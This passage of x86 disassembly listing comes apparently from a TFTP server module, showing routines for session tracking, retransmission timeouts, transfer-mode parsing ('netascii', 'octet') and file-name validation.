add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [esi+1001Ch], eax
jnz short loc_100286E
mov esi, ds:dword_10010AC
call esi ; dword_10010AC
call esi ; dword_10010AC
push dword ptr [eax]
call ds:dword_100102C
xor eax, eax
jmp short loc_100287A
; ---------------------------------------------------------------------------
loc_100286E: ; CODE XREF: sub_10027E1+75�j
add eax, 4
mov [esi+10020h], eax
loc_1002877: ; CODE XREF: sub_10027E1+34�j
push 1
pop eax
loc_100287A: ; CODE XREF: sub_10027E1+8B�j
pop edi
pop esi
retn 8
sub_10027E1 endp
; =============== S U B R O U T I N E =======================================
sub_100287F proc near ; CODE XREF: sub_1002F31+2C6�p
; sub_100333A+2CD�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_1006080
push esi
call ds:dword_1001058
mov ecx, dword_1006098
push esi
mov eax, [esp+8+arg_0]
mov [eax], ecx
mov dword ptr [eax+4], offset dword_1006098
mov [ecx+4], eax
mov dword_1006098, eax
call ds:dword_100104C
push 1
pop eax
pop esi
retn 4
sub_100287F endp
; =============== S U B R O U T I N E =======================================
sub_10028B5 proc near ; CODE XREF: sub_1002A3D+C�p
; sub_1002EC8+8�p ...
arg_0 = dword ptr 4
push ebx
mov ebx, ds:dword_1001058
push esi
push edi
mov edi, offset dword_1006080
push edi
call ebx ; dword_1001058
mov eax, dword_1006098
mov ecx, offset dword_1006098
loc_10028D0: ; CODE XREF: sub_10028B5+2D�j
cmp eax, ecx
jz short loc_10028F2
mov edx, [eax+8]
lea esi, [eax-18h]
cmp edx, [esp+0Ch+arg_0]
jz short loc_10028E4
mov eax, [eax]
jmp short loc_10028D0
; ---------------------------------------------------------------------------
loc_10028E4: ; CODE XREF: sub_10028B5+29�j
push esi
call ebx ; dword_1001058
push edi
call ds:dword_100104C
mov eax, esi
jmp short loc_10028FB
; ---------------------------------------------------------------------------
loc_10028F2: ; CODE XREF: sub_10028B5+1D�j
push edi
call ds:dword_100104C
xor eax, eax
loc_10028FB: ; CODE XREF: sub_10028B5+3B�j
pop edi
pop esi
pop ebx
retn 4
sub_10028B5 endp
; =============== S U B R O U T I N E =======================================
sub_1002901 proc near ; CODE XREF: sub_100297A+A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+20h]
cmp eax, 0FFFFFFFFh
jz short loc_1002915
push eax
call ds:dword_100111C
loc_1002915: ; CODE XREF: sub_1002901+B�j
mov eax, [esi+10004h]
test eax, eax
jz short loc_100292E
push 0
push eax
push dword_10060A0
call ds:dword_1001158
loc_100292E: ; CODE XREF: sub_1002901+1C�j
push 0
push dword ptr [esi+0FFFCh]
call ds:dword_1001168
push dword ptr [esi+0FFF8h]
call ds:dword_1001054
push esi
call ds:dword_1001028
pop esi
retn 4
sub_1002901 endp
; =============== S U B R O U T I N E =======================================
sub_1002953 proc near ; CODE XREF: sub_100297A+2F�p
; sub_100297A+37�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+1002Ch]
cmp eax, 0FFFFFFFFh
jz short loc_100296B
push eax
call ds:dword_100108C
pop ecx
loc_100296B: ; CODE XREF: sub_1002953+E�j
push esi
call ds:dword_10010A0
pop ecx
pop esi
retn 4
sub_1002953 endp
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_100297A proc near ; CODE XREF: sub_10029BA+55�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_10029B6
push esi
call sub_1002901
mov eax, [esi+24h]
dec eax
jz short loc_10029B0
dec eax
jz short loc_10029A8
dec eax
jz short loc_10029A0
dec eax
jnz short loc_10029B6
push esi
call nullsub_1
jmp short loc_10029B6
; ---------------------------------------------------------------------------
loc_10029A0: ; CODE XREF: sub_100297A+19�j
push esi
call nullsub_1
jmp short loc_10029B6
; ---------------------------------------------------------------------------
loc_10029A8: ; CODE XREF: sub_100297A+16�j
push esi
call sub_1002953
jmp short loc_10029B6
; ---------------------------------------------------------------------------
loc_10029B0: ; CODE XREF: sub_100297A+13�j
push esi
call sub_1002953
loc_10029B6: ; CODE XREF: sub_100297A+7�j
; sub_100297A+1C�j ...
pop esi
retn 4
sub_100297A endp
; =============== S U B R O U T I N E =======================================
sub_10029BA proc near ; DATA XREF: sub_10018DB+98�o
push ebx
mov ebx, ds:dword_1001058
push esi
push offset dword_1006080
call ebx ; dword_1001058
mov esi, dword_1006098
cmp esi, offset dword_1006098
jz short loc_1002A28
push edi
push ebp
loc_10029D9: ; CODE XREF: sub_10029BA+6A�j
lea edi, [esi-18h]
push edi
call ebx ; dword_1001058
mov ebp, [esi]
inc dword ptr [edi+10008h]
cmp dword ptr [edi+10008h], 4
lea eax, [edi+10008h]
push edi
jb short loc_1002A16
call ebx ; dword_1001058
mov eax, [esi]
mov esi, [esi+4]
mov [esi], eax
mov [eax+4], esi
mov ax, [edi+2Ah]
push eax
call ds:dword_1001104
push edi
call sub_100297A
jmp short loc_1002A1C
; ---------------------------------------------------------------------------
loc_1002A16: ; CODE XREF: sub_10029BA+3B�j
call ds:dword_100104C
loc_1002A1C: ; CODE XREF: sub_10029BA+5A�j
cmp ebp, offset dword_1006098
mov esi, ebp
jnz short loc_10029D9
pop ebp
pop edi
loc_1002A28: ; CODE XREF: sub_10029BA+1B�j
push offset dword_1006080
call ds:dword_100104C
call sub_1001A1F
pop esi
pop ebx
retn 8
sub_10029BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002A3D proc near ; DATA XREF: sub_1002F31+341�o
; sub_100333A+32C�o
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_10028B5
mov esi, eax
xor ebx, ebx
cmp esi, ebx
jz loc_1002B57
mov eax, [esi+1000Ch]
cmp eax, 0Ah
jnb loc_1002B0B
cmp eax, 5
jbe short loc_1002A8E
lea eax, [ebp+var_10]
push eax
call ds:dword_1001024
mov ax, [esi+2Ah]
push eax
call ds:dword_100110C
mov ax, [esi+3Ah]
push eax
call ds:dword_1001104
loc_1002A8E: ; CODE XREF: sub_1002A3D+2F�j
lea eax, [esi+28h]
push 10h
push eax
push ebx
push dword ptr [esi+10020h]
lea eax, [esi+38h]
push eax
push dword ptr [esi+20h]
call ds:dword_1001130
cmp eax, 0FFFFFFFFh
jnz short loc_1002AB3
call ds:dword_10010F8
loc_1002AB3: ; CODE XREF: sub_1002A3D+6E�j
mov edi, [esi+10004h]
inc dword ptr [esi+1000Ch]
cmp edi, ebx
jz loc_1002B4C
cmp [esi+10028h], ebx
jnz short loc_1002AEA
mov eax, [esi+10000h]
lea ecx, [esi+10000h]
shl eax, 1
mov edx, 2710h
mov [ecx], eax
cmp eax, edx
jbe short loc_1002AEA
mov [ecx], edx
loc_1002AEA: ; CODE XREF: sub_1002A3D+90�j
; sub_1002A3D+A9�j
mov eax, [esi+10000h]
push eax
push eax
push edi
push dword_10060A0
call ds:dword_1001154
cmp eax, ebx
jz short loc_1002B4C
call ds:dword_1001038
jmp short loc_1002B4C
; ---------------------------------------------------------------------------
loc_1002B0B: ; CODE XREF: sub_1002A3D+26�j
cmp esi, ebx
jz short loc_1002B57
push offset aTimeout ; "Timeout"
push ebx
push dword ptr [esi+20h]
lea eax, [esi+28h]
push ebx
push eax
call sub_100230A
mov eax, [esi+10004h]
lea edi, [esi+10004h]
cmp eax, ebx
jz short loc_1002B40
push ebx
push eax
push dword_10060A0
call ds:dword_1001158
loc_1002B40: ; CODE XREF: sub_1002A3D+F3�j
mov [edi], ebx
mov dword ptr [esi+10008h], 4
loc_1002B4C: ; CODE XREF: sub_1002A3D+84�j
; sub_1002A3D+C4�j ...
cmp esi, ebx
jz short loc_1002B57
push esi
call ds:dword_100104C
loc_1002B57: ; CODE XREF: sub_1002A3D+17�j
; sub_1002A3D+D0�j ...
pop edi
pop esi
pop ebx
leave
retn 8
sub_1002A3D endp
; =============== S U B R O U T I N E =======================================
sub_1002B5E proc near ; CODE XREF: sub_1002EC8+3D�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
push ebx
mov ebx, ds:dword_100110C
push ebp
push esi
mov esi, [esp+10h+arg_0]
push edi
mov edi, [esp+14h+arg_4]
xor ebp, ebp
mov eax, [esi+10018h]
push 4
mov [esp+18h+var_4], ebp
mov [edi+20h], eax
call ebx ; dword_100110C
cmp [edi+34h], ax
jnz short loc_1002BA6
mov ax, [esi+10014h]
push eax
call ebx ; dword_100110C
cmp [edi+36h], ax
jnz short loc_1002BA6
and dword ptr [esi+1000Ch], 0
push 1
pop ebp
jmp short loc_1002BCE
; ---------------------------------------------------------------------------
loc_1002BA6: ; CODE XREF: sub_1002B5E+2A�j
; sub_1002B5E+3A�j
mov ax, [edi+36h]
push eax
call ebx ; dword_100110C
mov ax, [edi+34h]
push eax
call ds:dword_1001104
push 4
call ebx ; dword_100110C
cmp [edi+34h], ax
jnz short loc_1002BCE
mov ax, [esi+10014h]
dec ax
push eax
call ebx ; dword_100110C
loc_1002BCE: ; CODE XREF: sub_1002B5E+46�j
; sub_1002B5E+62�j
test ebp, ebp
jz loc_1002C96
cmp dword ptr [esi+10030h], 0
jz short loc_1002C1C
mov eax, [esi+10004h]
lea edi, [esi+10004h]
test eax, eax
jz short loc_1002BFE
push 0
push eax
push dword_10060A0
call ds:dword_1001158
loc_1002BFE: ; CODE XREF: sub_1002B5E+8F�j
and dword ptr [edi], 0
mov dword ptr [esi+10008h], 4
loc_1002C0B: ; CODE XREF: sub_1002B5E+DB�j
; sub_1002B5E+13E�j ...
push esi
call ds:dword_100104C
xor eax, eax
loc_1002C14: ; CODE XREF: sub_1002B5E+183�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn 8
; ---------------------------------------------------------------------------
loc_1002C1C: ; CODE XREF: sub_1002B5E+7F�j
inc word ptr [esi+10014h]
push edi
push esi
call sub_10027E1
mov ebp, eax
xor eax, eax
cmp ebp, eax
jnz short loc_1002C3B
mov ax, [edi+0Eh]
push eax
call ebx ; dword_100110C
jmp short loc_1002C0B
; ---------------------------------------------------------------------------
loc_1002C3B: ; CODE XREF: sub_1002B5E+D2�j
cmp [esi+10028h], eax
mov [esi+1000Ch], eax
mov [esi+10008h], eax
jnz short loc_1002C59
mov dword ptr [esi+10000h], 3E8h
loc_1002C59: ; CODE XREF: sub_1002B5E+EF�j
mov ecx, [esi+10004h]
cmp ecx, eax
jz short loc_1002C78
mov eax, [esi+10000h]
push eax
push eax
push ecx
push dword_10060A0
call ds:dword_1001154
loc_1002C78: ; CODE XREF: sub_1002B5E+103�j
mov eax, [esi+1001Ch]
cmp eax, [edi+20h]
jnb short loc_1002C9A
mov ax, [edi+0Eh]
push eax
call ebx ; dword_100110C
mov dword ptr [esi+10030h], 1
jmp short loc_1002C9A
; ---------------------------------------------------------------------------
loc_1002C96: ; CODE XREF: sub_1002B5E+72�j
mov ebp, [esp+14h+var_4]
loc_1002C9A: ; CODE XREF: sub_1002B5E+123�j
; sub_1002B5E+136�j
test ebp, ebp
jz loc_1002C0B
mov ax, [edi+0Eh]
push eax
call ebx ; dword_100110C
add edi, 0Ch
push 10h
push edi
push 0
push dword ptr [esi+10020h]
lea eax, [esi+38h]
push eax
push dword ptr [esi+20h]
call ds:dword_1001130
cmp eax, 0FFFFFFFFh
jnz loc_1002C0B
call ds:dword_10010F8
test esi, esi
jz short loc_1002CDE
push esi
call ds:dword_100104C
loc_1002CDE: ; CODE XREF: sub_1002B5E+177�j
push 1
pop eax
jmp loc_1002C14
sub_1002B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002CE6 proc near ; CODE XREF: sub_1002EC8+34�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, ds:dword_100110C
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
push 3
mov eax, [esi+10018h]
mov [edi+20h], eax
call ebx ; dword_100110C
cmp [edi+34h], ax
jnz short loc_1002D3A
mov ax, [esi+10014h]
inc ax
push eax
call ebx ; dword_100110C
cmp [edi+36h], ax
jnz short loc_1002D3A
inc word ptr [esi+10014h]
xor ebx, ebx
mov [ebp+var_4], 1
mov [esi+10008h], ebx
jmp short loc_1002D9D
; ---------------------------------------------------------------------------
loc_1002D3A: ; CODE XREF: sub_1002CE6+28�j
; sub_1002CE6+3A�j
push 3
call ebx ; dword_100110C
cmp [edi+34h], ax
jnz short loc_1002D9B
mov ax, [esi+10014h]
push eax
call ebx ; dword_100110C
cmp [edi+36h], ax
jnz short loc_1002D9B
mov ebx, ds:dword_1001104
push 4
call ebx ; dword_1001104
mov [esi+38h], ax
mov ax, [esi+10014h]
push eax
call ebx ; dword_1001104
add edi, 0Ch
push 10h
mov [esi+3Ah], ax
push edi
push 0
lea eax, [esi+38h]
push 4
push eax
push dword ptr [esi+20h]
call ds:dword_1001130
cmp eax, 0FFFFFFFFh
jnz loc_1002EB3
call ds:dword_10010F8
jmp loc_1002EB3
; ---------------------------------------------------------------------------
loc_1002D9B: ; CODE XREF: sub_1002CE6+5C�j
; sub_1002CE6+6C�j
xor ebx, ebx
loc_1002D9D: ; CODE XREF: sub_1002CE6+52�j
cmp [ebp+var_4], ebx
jz short loc_1002DE4
lea eax, [ebp+arg_4]
push eax
mov eax, [edi+2Ch]
push dword ptr [esi+10030h]
sub eax, 4
push eax
lea eax, [edi+38h]
push eax
push dword ptr [esi+1002Ch]
call sub_100373A
cmp [ebp+var_4], ebx
mov [ebp+arg_0], eax
jz short loc_1002DE4
cmp eax, ebx
jge short loc_1002DF7
push ebx
push 3
push dword ptr [edi+8]
lea eax, [edi+0FFF1h]
add edi, 0Ch
push eax
push edi
call sub_100230A
loc_1002DE4: ; CODE XREF: sub_1002CE6+BA�j
; sub_1002CE6+E2�j
cmp esi, ebx
jz short loc_1002DEF
push esi
call ds:dword_100104C
loc_1002DEF: ; CODE XREF: sub_1002CE6+100�j
push 1
pop eax
jmp loc_1002EBC
; ---------------------------------------------------------------------------
loc_1002DF7: ; CODE XREF: sub_1002CE6+E6�j
mov eax, [edi+2Ch]
sub eax, 4
cmp eax, [edi+20h]
ja loc_1002EB3
mov ebx, ds:dword_1001104
push 4
call ebx ; dword_1001104
mov [esi+38h], ax
mov ax, [esi+10014h]
push eax
call ebx ; dword_1001104
mov [esi+3Ah], ax
lea eax, [edi+0Ch]
push 10h
xor ebx, ebx
push eax
push ebx
lea eax, [esi+38h]
push 4
push eax
push dword ptr [esi+20h]
call ds:dword_1001130
mov [ebp+arg_0], eax
mov eax, [esi+10004h]
cmp eax, ebx
jz short loc_1002E74
cmp [esi+10028h], ebx
mov [esi+1000Ch], ebx
jnz short loc_1002E5F
mov dword ptr [esi+10000h], 3E8h
loc_1002E5F: ; CODE XREF: sub_1002CE6+16D�j
mov ecx, [esi+10000h]
push ecx
push ecx
push eax
push dword_10060A0
call ds:dword_1001154
loc_1002E74: ; CODE XREF: sub_1002CE6+15F�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_1002E80
call ds:dword_10010F8
loc_1002E80: ; CODE XREF: sub_1002CE6+192�j
mov eax, [edi+2Ch]
sub eax, 4
cmp eax, [edi+20h]
jnb short loc_1002EB3
mov eax, [esi+10004h]
cmp eax, ebx
jz short loc_1002EA3
push ebx
push eax
push dword_10060A0
call ds:dword_1001158
loc_1002EA3: ; CODE XREF: sub_1002CE6+1AD�j
mov [esi+10004h], ebx
mov dword ptr [esi+10008h], 4
loc_1002EB3: ; CODE XREF: sub_1002CE6+A4�j
; sub_1002CE6+B0�j ...
push esi
call ds:dword_100104C
xor eax, eax
loc_1002EBC: ; CODE XREF: sub_1002CE6+10C�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_1002CE6 endp
; =============== S U B R O U T I N E =======================================
sub_1002EC3 proc near ; CODE XREF: sub_1002EC8+22�p
; sub_1002EC8+2B�p
xor eax, eax
retn 8
sub_1002EC3 endp
; =============== S U B R O U T I N E =======================================
sub_1002EC8 proc near ; CODE XREF: sub_1001A91+254�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+8]
call sub_10028B5
test eax, eax
jz short loc_1002F0A
mov ecx, [eax+24h]
dec ecx
jz short loc_1002F03
dec ecx
jz short loc_1002EFA
dec ecx
jz short loc_1002EF1
dec ecx
jnz short loc_1002F0A
push esi
push eax
call sub_1002EC3
jmp short loc_1002F0A
; ---------------------------------------------------------------------------
loc_1002EF1: ; CODE XREF: sub_1002EC8+1B�j
push esi
push eax
call sub_1002EC3
jmp short loc_1002F0A
; ---------------------------------------------------------------------------
loc_1002EFA: ; CODE XREF: sub_1002EC8+18�j
push esi
push eax
call sub_1002CE6
jmp short loc_1002F0A
; ---------------------------------------------------------------------------
loc_1002F03: ; CODE XREF: sub_1002EC8+15�j
push esi
push eax
call sub_1002B5E
loc_1002F0A: ; CODE XREF: sub_1002EC8+F�j
; sub_1002EC8+1E�j ...
pop esi
retn 4
sub_1002EC8 endp
; =============== S U B R O U T I N E =======================================
sub_1002F0E proc near ; CODE XREF: sub_1002F31+20�p
; sub_100333A+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
cmp [esp+arg_4], eax
jbe short loc_1002F27
loc_1002F16: ; CODE XREF: sub_1002F0E+17�j
mov ecx, [esp+arg_0]
cmp byte ptr [eax+ecx], 0
jz short loc_1002F2C
inc eax
cmp eax, [esp+arg_4]
jb short loc_1002F16
loc_1002F27: ; CODE XREF: sub_1002F0E+6�j
xor eax, eax
locret_1002F29: ; CODE XREF: sub_1002F0E+21�j
retn 8
; ---------------------------------------------------------------------------
loc_1002F2C: ; CODE XREF: sub_1002F0E+10�j
push 1
pop eax
jmp short locret_1002F29
sub_1002F0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002F31 proc near ; CODE XREF: sub_1001A91+223�p
; DATA XREF: sub_1001A91+1FC�o
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
and [ebp+var_10], 0
and [ebp+var_14], 0
push esi
mov esi, [ebp+arg_0]
push edi
push 0FFBAh
lea ebx, [esi+36h]
push ebx
mov [ebp+var_18], ebx
call sub_1002F0E
test eax, eax
jz loc_100330F
mov edi, ebx
or ecx, 0FFFFFFFFh
xor eax, eax
push 10034h
repne scasb
not ecx
dec ecx
lea eax, [ecx+ebx+1]
mov [ebp+var_4], eax
call ds:dword_1001094
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_1003331
mov ecx, 400Dh
xor eax, eax
mov edi, ebx
rep stosd
push dword ptr [esi+10h]
call ds:dword_1001120
mov [ebp+var_8], eax
mov ax, [esi+0Eh]
push eax
call ds:dword_1001104
mov edi, [ebp+var_4]
mov [ebp+var_C], edi
mov al, [edi]
test al, al
jz short loc_1002FCD
loc_1002FB5: ; CODE XREF: sub_1002F31+97�j
movsx eax, al
push eax
call ds:dword_1001150
mov [edi], al
mov al, [edi+1]
inc edi
pop ecx
test al, al
jnz short loc_1002FB5
mov [ebp+var_C], edi
loc_1002FCD: ; CODE XREF: sub_1002F31+82�j
mov edi, [ebp+var_4]
mov eax, offset aNetascii ; "netascii"
loc_1002FD5: ; CODE XREF: sub_1002F31+C0�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_1002FF7
test cl, cl
jz short loc_1002FF3
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_1002FF7
inc edi
inc edi
inc eax
inc eax
test cl, cl
jnz short loc_1002FD5
loc_1002FF3: ; CODE XREF: sub_1002F31+AE�j
xor eax, eax
jmp short loc_1002FFC
; ---------------------------------------------------------------------------
loc_1002FF7: ; CODE XREF: sub_1002F31+AA�j
; sub_1002F31+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_1002FFC: ; CODE XREF: sub_1002F31+C4�j
test eax, eax
jz short loc_1003037
mov edi, [ebp+var_4]
mov eax, offset aOctet ; "octet"
loc_1003008: ; CODE XREF: sub_1002F31+F3�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_100302A
test cl, cl
jz short loc_1003026
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_100302A
inc edi
inc edi
inc eax
inc eax
test cl, cl
jnz short loc_1003008
loc_1003026: ; CODE XREF: sub_1002F31+E1�j
xor eax, eax
jmp short loc_100302F
; ---------------------------------------------------------------------------
loc_100302A: ; CODE XREF: sub_1002F31+DD�j
; sub_1002F31+EB�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_100302F: ; CODE XREF: sub_1002F31+F7�j
test eax, eax
jnz loc_10032F6
loc_1003037: ; CODE XREF: sub_1002F31+CD�j
mov edi, [ebp+var_18]
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [esi+1FFADh]
repne scasb
not ecx
sub edi, ecx
push edx
mov eax, ecx
mov esi, edi
mov edi, edx
mov [ebp+var_4], edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_100261E
test eax, eax
jnz short loc_1003071
push offset aMalformedFileN ; "Malformed file name"
jmp short loc_10030CB
; ---------------------------------------------------------------------------
loc_1003071: ; CODE XREF: sub_1002F31+137�j
push [ebp+var_8]
push offset dword_1005CE8
call sub_10039D6
test eax, eax
jnz short loc_1003093
push [ebp+var_8]
push offset dword_1005D20
call sub_10039D6
test eax, eax
jz short loc_10030A4
loc_1003093: ; CODE XREF: sub_1002F31+14F�j
push [ebp+var_4]
push offset dword_1005D58
call sub_10039D6
test eax, eax
jnz short loc_10030B0
loc_10030A4: ; CODE XREF: sub_1002F31+160�j
call ds:dword_10010AC
push 0
push 2
jmp short loc_1003100
; ---------------------------------------------------------------------------
loc_10030B0: ; CODE XREF: sub_1002F31+171�j
push (offset dword_1005E07+1)
push 0FFBCh
push [ebp+var_4]
call sub_100273D
test eax, eax
jnz short loc_10030CF
push offset aFileNameTooLon ; "File name too long"
loc_10030CB: ; CODE XREF: sub_1002F31+13E�j
push 0
jmp short loc_1003100
; ---------------------------------------------------------------------------
loc_10030CF: ; CODE XREF: sub_1002F31+193�j
push 8000h
push [ebp+var_4]
call ds:dword_10010E4
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebx+1002Ch], eax
jnz short loc_1003116
mov esi, ds:dword_10010AC
call esi ; dword_10010AC
push dword ptr [eax]
call ds:dword_100102C
call esi ; dword_10010AC
push 0
push 1
loc_1003100: ; CODE XREF: sub_1002F31+17D�j
; sub_1002F31+19C�j
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
lea ecx, [eax+0FFF1h]
add eax, 0Ch
push ecx
push eax
jmp loc_1003308
; ---------------------------------------------------------------------------
loc_1003116: ; CODE XREF: sub_1002F31+1B7�j
mov edi, ds:dword_1001088
push 2
push 0
push eax
call edi ; dword_1001088
mov esi, [ebp+arg_0]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_1003140
push 0
push 0
mov [esi+24h], eax
push dword ptr [ebx+1002Ch]
call edi ; dword_1001088
add esp, 0Ch
loc_1003140: ; CODE XREF: sub_1002F31+1FB�j
cmp eax, 0FFFFFFFFh
jnz short loc_1003159
mov edi, ds:dword_10010AC
call edi ; dword_10010AC
call edi ; dword_10010AC
push dword ptr [eax]
call ds:dword_100102C
jmp short loc_1003197
; ---------------------------------------------------------------------------
loc_1003159: ; CODE XREF: sub_1002F31+212�j
push 0
push 2
push 2
call ds:dword_100112C
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz short loc_1003191
mov eax, [esi+1Ch]
and [ebp+var_26], 0
mov [ebp+var_24], eax
lea eax, [ebp+var_28]
push 10h
push eax
push edi
mov [ebp+var_28], 2
call ds:dword_1001124
test eax, eax
jz short loc_10031A3
loc_1003191: ; CODE XREF: sub_1002F31+23C�j
call ds:dword_10010F8
loc_1003197: ; CODE XREF: sub_1002F31+226�j
push offset aInsufficientRe ; "Insufficient resources"
push 0
jmp loc_10032FA
; ---------------------------------------------------------------------------
loc_10031A3: ; CODE XREF: sub_1002F31+25E�j
push ebx
mov [esi+8], edi
call ds:dword_1001044
mov [ebx+20h], edi
add esi, 0Ch
lea edi, [ebx+28h]
mov [ebp+var_8], esi
movsd
movsd
movsd
movsd
xor edi, edi
push edi
push edi
push edi
push edi
call ds:dword_1001040
cmp eax, edi
mov [ebx+0FFF8h], eax
jz short loc_10031E8
push 2
push eax
push [ebp+var_4]
call sub_100188E
cmp eax, edi
mov [ebx+0FFFCh], eax
jnz short loc_10031F3
loc_10031E8: ; CODE XREF: sub_1002F31+2A0�j
call ds:dword_1001038
jmp loc_1003312
; ---------------------------------------------------------------------------
loc_10031F3: ; CODE XREF: sub_1002F31+2B5�j
add ebx, 18h
push ebx
call sub_100287F
push 1
pop esi
push [ebp+var_4]
mov [ebp+var_14], esi
call sub_10028B5
mov ebx, eax
cmp ebx, edi
jz loc_1003312
lea edi, [ebx+10028h]
lea eax, [ebx+38h]
push edi
push eax
lea eax, [ebx+10024h]
mov [ebp+var_10], esi
push eax
mov eax, [ebp+var_C]
push esi
mov esi, [ebp+arg_0]
inc eax
push eax
push esi
call sub_10023D8
test eax, eax
jnz loc_1003312
cmp [edi], eax
jz short loc_1003255
mov eax, [esi+28h]
imul eax, 3E8h
mov [ebx+10000h], eax
jmp short loc_100325F
; ---------------------------------------------------------------------------
loc_1003255: ; CODE XREF: sub_1002F31+311�j
mov dword ptr [ebx+10000h], 3E8h
loc_100325F: ; CODE XREF: sub_1002F31+322�j
mov eax, [ebx+10000h]
push 0
push eax
push eax
push dword ptr [ebx+20h]
lea eax, [ebx+10004h]
push offset sub_1002A3D
push eax
push dword_10060A0
call ds:dword_1001178
push 1
pop edi
mov [ebx+24h], edi
mov eax, [esi+20h]
push esi
push ebx
mov [ebx+10018h], eax
mov [ebx+10014h], di
call sub_10027E1
push 10h
xor ecx, ecx
push [ebp+var_8]
cmp eax, ecx
mov [ebx+1000Ch], ecx
push ecx
push dword ptr [ebx+10020h]
jz short loc_10032D9
lea eax, [ebx+38h]
push eax
push [ebp+var_4]
call ds:dword_1001130
mov ecx, [ebx+1001Ch]
cmp ecx, [esi+20h]
jnb short loc_10032E9
mov [ebx+10030h], edi
jmp short loc_10032E9
; ---------------------------------------------------------------------------
loc_10032D9: ; CODE XREF: sub_1002F31+386�j
add esi, 0FFF1h
push esi
push [ebp+var_4]
call ds:dword_1001130
loc_10032E9: ; CODE XREF: sub_1002F31+39E�j
; sub_1002F31+3A6�j
cmp eax, 0FFFFFFFFh
jnz short loc_1003312
call ds:dword_10010F8
jmp short loc_1003312
; ---------------------------------------------------------------------------
loc_10032F6: ; CODE XREF: sub_1002F31+100�j
push 0
push 4
loc_10032FA: ; CODE XREF: sub_1002F31+26D�j
push dword ptr [esi+8]
lea eax, [esi+0FFF1h]
add esi, 0Ch
push eax
push esi
loc_1003308: ; CODE XREF: sub_1002F31+1E0�j
call sub_100230A
jmp short loc_1003312
; ---------------------------------------------------------------------------
loc_100330F: ; CODE XREF: sub_1002F31+27�j
mov ebx, [ebp+arg_0]
loc_1003312: ; CODE XREF: sub_1002F31+2BD�j
; sub_1002F31+2DD�j ...
test ebx, ebx
jz short loc_1003331
cmp [ebp+var_10], 0
jz short loc_1003323
push ebx
call ds:dword_100104C
loc_1003323: ; CODE XREF: sub_1002F31+3E9�j
cmp [ebp+var_14], 0
jnz short loc_1003331
push ebx
call ds:dword_10010A0
pop ecx
loc_1003331: ; CODE XREF: sub_1002F31+50�j
; sub_1002F31+3E3�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_1002F31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100333A proc near ; DATA XREF: sub_1001A91+20F�o
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
and [ebp+var_10], 0
and [ebp+var_14], 0
push ebx
push esi
push edi
push 10034h
call ds:dword_1001094
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_1003731
mov ecx, 400Dh
xor eax, eax
mov edi, ebx
push 0FFBAh
rep stosd
mov eax, [ebp+arg_0]
lea esi, [eax+36h]
push esi
mov [ebp+var_4], esi
call sub_1002F0E
test eax, eax
jz loc_1003712
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov edi, [ebp+arg_0]
not ecx
push dword ptr [edi+10h]
dec ecx
lea esi, [ecx+esi+1]
call ds:dword_1001120
mov [ebp+var_18], eax
mov ax, [edi+0Eh]
push eax
call ds:dword_1001104
cmp byte ptr [esi], 0
mov edi, esi
mov [ebp+var_C], edi
jz short loc_10033E1
loc_10033BC: ; CODE XREF: sub_100333A+A2�j
movsx eax, byte ptr [edi]
push eax
call ds:dword_100114C
test eax, eax
movsx eax, byte ptr [edi]
pop ecx
jz short loc_10033D6
push eax
call ds:dword_1001150
pop ecx
